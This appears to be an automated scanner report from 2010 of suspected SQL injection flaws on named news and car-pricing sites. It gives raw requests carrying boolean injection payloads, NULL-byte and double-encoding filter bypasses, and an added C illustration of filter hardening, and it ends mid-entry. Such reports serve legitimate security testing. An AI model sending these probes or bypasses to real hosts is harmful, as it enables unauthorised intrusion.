The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 15133132%20or%201%3d1--%20 and 15133132%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56815133132%20or%201%3d1--%20/200957.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:48 GMT
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56815133132%20or%201%3d2--%20/200957.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:48 GMT
Content-Length: 0
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 14002997'%20or%201%3d1--%20 and 14002997'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56814002997'%20or%201%3d1--%20/200960.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:58 GMT
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56814002997'%20or%201%3d2--%20/200960.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:58 GMT
Content-Length: 0
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20696714'%20or%201%3d1--%20 and 20696714'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi20696714'%20or%201%3d1--%20/rss/CustomRssServlet/568/203708.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:18 GMT
Date: Tue, 07 Dec 2010 23:19:18 GMT
Content-Length: 424
Connection: close
Request 2
GET /mngi20696714'%20or%201%3d2--%20/rss/CustomRssServlet/568/203708.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:18 GMT
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568%00'/203708.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:19:28 GMT
Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568%00''/203708.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:28 GMT
Content-Length: 0
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 15372256'%20or%201%3d1--%20 and 15372256'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance the payload is appended to the servlet name segment itself (CustomRssServlet15372256'...), so a 404 for the modified path would be unsurprising whatever the application does with it, and the two responses below carry different Server headers (Microsoft-IIS/6.0 with ASP.NET for the 404, Microsoft-IIS/5.0 with ATG for the empty 200), which suggests they were handled by different back-end hosts. Repeat the pair alongside unmodified baseline requests and compare only responses from the same host before attributing the difference to the payload.
Request 1
GET /mngi/rss/CustomRssServlet15372256'%20or%201%3d1--%20/568/210701.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:03 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet15372256'%20or%201%3d2--%20/568/210701.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:21:04 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance the two responses below again carry different Server headers (Microsoft-IIS/6.0 with ASP.NET for the 404, Microsoft-IIS/5.0 with ATGPlatform/7.1 for the empty 200), so the difference may reflect which back-end host answered each request rather than the 1=1 versus 1=2 condition. Repeat the pair, together with unmodified baseline requests, and compare only responses from the same host.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/214511.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:50 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/214511.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:50 GMT Content-Length: 0 Connection: close
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. In the evidence below the error is again a bare 400 Bad Request (Invalid URL) with no database content, so it does not by itself show that the quote reached a SQL query.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568/214511.xml%00' HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Expires: Tue, 07 Dec 2010 23:22:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 07 Dec 2010 23:22:52 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568/214511.xml%00'' HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. In the evidence below both requests return 404 from the Omniture DC server: the first with a generic Not Found page whose echoed path stops at the %00 (/b/ss/cvencarpricesecrets), showing that the server itself truncates the URL at the NULL byte, and the second with an empty body. Neither response contains database output; the only difference is whether an error page body is returned.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /b/ss/cvencarpricesecrets%00'/1/H.16/s75690248599275?[AQB]&ndh=1&t=7/11/2010%2016%3A55%3A22%202%20360&vmt=48DA665D&ns=classifiedventures1&pageName=DLP%20-%20Make&g=http%3A//www.carpricesecrets.com/mercury%3Ft_se%3Dmsn%26t_campid%3D1295942%26t_adgpid%3D147006720%26t_adid%3D262573534%26t_keyid%3D1323580327%26t_mtype%3Dc&r=http%3A//cm.npc-medianews.overture.com/js_1_0/%3Fconfig%3D2554942840%26type%3Dmisc%26ctxtId%3Dmisc%26keywordCharEnc%3Dutf8%26source%3Dnpc_mng_sanjosemercurynews_t2_ctxt%26adwd%3D728%26adht%3D90%26ctxtUrl%3Dhttp%253A%252F%252Fwww.mercurynews.com%252F%26du%3D1%26cb%3D1291762313102%26ctxtContent%3D%253Chead%253E%253C&cc=USD&ch=/mercury&server=www.carpricesecrets.com&events=event8%2Cevent2&c1=1&v1=1&c3=2%3A30PM&c4=Tuesday&c5=Weekday&c6=New&c7=28&v7=Step1%3A%20Quote-Make%20Landing%20Page&c8=999&v11=2%3A30PM&v12=Tuesday&v13=Weekday&v14=New&v32=Paid&v35=MSN&v40=MSN&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1419&bh=892&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1 Host: metrics.carpricesecrets.com Proxy-Connection: keep-alive Referer: http://www.carpricesecrets.com/mercury?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op387homepage1gum=a02f08301726c7j09t6e489c1; op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; s_nr=1291762522620
Response 1
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 00:49:33 GMT Server: Omniture DC/2.0.0 Content-Length: 429 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/cvencarpricesecrets was not found on this serve ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b/ss/cvencarpricesecrets%00''/1/H.16/s75690248599275?[AQB]&ndh=1&t=7/11/2010%2016%3A55%3A22%202%20360&vmt=48DA665D&ns=classifiedventures1&pageName=DLP%20-%20Make&g=http%3A//www.carpricesecrets.com/mercury%3Ft_se%3Dmsn%26t_campid%3D1295942%26t_adgpid%3D147006720%26t_adid%3D262573534%26t_keyid%3D1323580327%26t_mtype%3Dc&r=http%3A//cm.npc-medianews.overture.com/js_1_0/%3Fconfig%3D2554942840%26type%3Dmisc%26ctxtId%3Dmisc%26keywordCharEnc%3Dutf8%26source%3Dnpc_mng_sanjosemercurynews_t2_ctxt%26adwd%3D728%26adht%3D90%26ctxtUrl%3Dhttp%253A%252F%252Fwww.mercurynews.com%252F%26du%3D1%26cb%3D1291762313102%26ctxtContent%3D%253Chead%253E%253C&cc=USD&ch=/mercury&server=www.carpricesecrets.com&events=event8%2Cevent2&c1=1&v1=1&c3=2%3A30PM&c4=Tuesday&c5=Weekday&c6=New&c7=28&v7=Step1%3A%20Quote-Make%20Landing%20Page&c8=999&v11=2%3A30PM&v12=Tuesday&v13=Weekday&v14=New&v32=Paid&v35=MSN&v40=MSN&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1419&bh=892&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1 Host: metrics.carpricesecrets.com Proxy-Connection: keep-alive Referer: http://www.carpricesecrets.com/mercury?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op387homepage1gum=a02f08301726c7j09t6e489c1; op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; s_nr=1291762522620
Response 2
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 00:49:33 GMT Server: Omniture DC/2.0.0 xserver: www608 Content-Length: 0 Content-Type: text/html
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. In the evidence below both requests return 404 from the Omniture DC server, the first with a generic Not Found page and the second with an empty body; neither contains database output.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will already have carried out one decode; the 404 page above echoes the requested path as /b%27/ss/cvennewscars/1/H.14/, that is, after exactly one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, never before it.
Request 1
GET /b%2527/ss/cvennewscars/1/H.14/?ns=classifiedventures1&events=event5 HTTP/1.1 Host: metrics.carpricesecrets.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; __utmz=131857437.1291762524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|267F5DCB051580AB-40000170603794A2[CE]; s_nr=1291762522620; __utma=131857437.1334277704.1291762524.1291762524.1291762524.1; __utmc=131857437; __utmb=131857437.1.10.1291762524; op387homepage1gum=a02f08301726c7j09t6e489c1;
Response 1
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 01:06:06 GMT Server: Omniture DC/2.0.0 Content-Length: 433 Content-Type: text/html; charset=iso-8859-1 Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b%27/ss/cvennewscars/1/H.14/ was not found on this s ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b%2527%2527/ss/cvennewscars/1/H.14/?ns=classifiedventures1&events=event5 HTTP/1.1 Host: metrics.carpricesecrets.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; __utmz=131857437.1291762524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|267F5DCB051580AB-40000170603794A2[CE]; s_nr=1291762522620; __utma=131857437.1334277704.1291762524.1291762524.1291762524.1; __utmc=131857437; __utmb=131857437.1.10.1291762524; op387homepage1gum=a02f08301726c7j09t6e489c1;
Response 2
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 01:06:06 GMT Server: Omniture DC/2.0.0 xserver: www609 Content-Length: 0 Content-Type: text/html Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As with the cvencarpricesecrets path above, both responses below are 404s from the Omniture DC server, the first with a Not Found page whose echoed path stops at the %00 (/b/ss/cvennewscars) and the second with an empty body; neither contains database output.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /b/ss/cvennewscars%00'/1/H.14/?ns=classifiedventures1&events=event5 HTTP/1.1 Host: metrics.carpricesecrets.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; __utmz=131857437.1291762524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|267F5DCB051580AB-40000170603794A2[CE]; s_nr=1291762522620; __utma=131857437.1334277704.1291762524.1291762524.1291762524.1; __utmc=131857437; __utmb=131857437.1.10.1291762524; op387homepage1gum=a02f08301726c7j09t6e489c1;
Response 1
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 01:06:09 GMT Server: Omniture DC/2.0.0 Content-Length: 422 Content-Type: text/html; charset=iso-8859-1 Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/cvennewscars was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
Request 2
GET /b/ss/cvennewscars%00''/1/H.14/?ns=classifiedventures1&events=event5 HTTP/1.1 Host: metrics.carpricesecrets.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; __utmz=131857437.1291762524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|267F5DCB051580AB-40000170603794A2[CE]; s_nr=1291762522620; __utma=131857437.1334277704.1291762524.1291762524.1291762524.1; __utmc=131857437; __utmb=131857437.1.10.1291762524; op387homepage1gum=a02f08301726c7j09t6e489c1;
Response 2
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 01:06:09 GMT Server: Omniture DC/2.0.0 xserver: www614 Content-Length: 0 Content-Type: text/html Connection: close
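The NULL byte and double-URL-encoding bypasses described in the remediation notes for the issues above both come down to the same mistake: a filter validates a different string from the one the application eventually uses. The following C program is an added illustration, not code from the scanner or from any of the sites reported here. It decodes the three probe values seen on this page (568', 568%00' and b%2527, used here as constructed inputs), shows how many bytes a NUL-terminated C string makes visible, and contrasts a hypothetical native filter that decodes once and calls strchr with a hardened one that canonicalises first and then scans the full decoded length. The filter names and buffer sizes are assumptions made for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Percent-decode in[0..inlen) into out. Returns the true decoded length,
 * which counts any embedded NUL produced by %00; the buffer is also
 * NUL-terminated so it can be handed to str* functions, which is exactly
 * where the trouble starts. */
static size_t url_decode(const unsigned char *in, size_t inlen,
                         unsigned char *out, size_t outsz) {
    size_t n = 0;
    for (size_t i = 0; i < inlen && n + 1 < outsz; i++) {
        if (in[i] == '%' && i + 2 < inlen &&
            isxdigit(in[i + 1]) && isxdigit(in[i + 2])) {
            char hex[3] = { (char)in[i + 1], (char)in[i + 2], 0 };
            out[n++] = (unsigned char)strtoul(hex, NULL, 16);
            i += 2;
        } else {
            out[n++] = in[i];
        }
    }
    out[n] = 0;
    return n;
}

/* Bytes of the decoded value that a NUL-terminated C string exposes. */
size_t native_visible_len(const char *raw) {
    unsigned char buf[256];
    url_decode((const unsigned char *)raw, strlen(raw), buf, sizeof buf);
    return strlen((const char *)buf);
}

/* Bytes of the decoded value that a length-aware consumer (a Java servlet
 * container, for instance) actually receives. */
size_t decoded_len(const char *raw) {
    unsigned char buf[256];
    return url_decode((const unsigned char *)raw, strlen(raw), buf, sizeof buf);
}

/* Hypothetical native-code filter: decode once, then look for a quote with
 * strchr. strchr stops at the first NUL, so 568%00' decodes to
 * {'5','6','8',0,'\''} and the quote is never examined; b%2527 decodes to
 * the literal b%27, which contains no quote yet. Returns 1 if blocked. */
int naive_filter_blocks(const char *raw) {
    unsigned char buf[256];
    url_decode((const unsigned char *)raw, strlen(raw), buf, sizeof buf);
    return strchr((const char *)buf, '\'') != NULL;
}

/* Hardened filter: canonicalise first (decode until the value stops
 * changing, with a bound on rounds), then validate over the true length
 * with memchr. An embedded NUL is rejected outright rather than being
 * allowed to truncate the check. Returns 1 if blocked. */
int canonical_filter_blocks(const char *raw) {
    unsigned char a[256], b[256];
    size_t alen = url_decode((const unsigned char *)raw, strlen(raw), a, sizeof a);
    for (int round = 0; round < 4; round++) {
        size_t blen = url_decode(a, alen, b, sizeof b);
        if (blen == alen && memcmp(a, b, alen) == 0)
            break;                              /* stable: fully decoded */
        memcpy(a, b, blen);
        alen = blen;
    }
    if (memchr(a, 0, alen) != NULL)
        return 1;                               /* NUL in a path segment: invalid */
    return memchr(a, '\'', alen) != NULL;
}

int main(void) {
    /* The three encodings reported on this page, as constructed inputs. */
    const char *probes[] = { "568'", "568%00'", "b%2527" };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        printf("%-8s native sees %zu of %zu bytes; naive filter %s, canonical filter %s\n",
               probes[i], native_visible_len(probes[i]), decoded_len(probes[i]),
               naive_filter_blocks(probes[i]) ? "blocks" : "allows",
               canonical_filter_blocks(probes[i]) ? "blocks" : "allows");
    }
    return 0;
}
```

Compile with cc -std=c99 and run: the naive filter lets both encoded probes through while the canonical one blocks all three, and the embedded NUL shrinks the visible length of 568%00' from five bytes to three. Rejecting an embedded NUL outright, rather than silently truncating at it, is the right choice for a URL path component, and decoding to a fixed point before validating is what defeats %2527.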
The conTy2 parameter appears to be vulnerable to SQL injection attacks. The payloads 13898589'%20or%201%3d1--%20 and 13898589'%20or%201%3d2--%20 were each submitted in the conTy2 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance both responses are 200 with the same content type and differ in Content-Length by ten bytes (19343 versus 19333); the ad payload embeds per-request identifiers and a fresh Set-Cookie value on every request, so a small length difference is expected even between two identical requests. Send the unmodified request several times to measure that baseline variation before treating the difference as a SQL condition.
Request 1
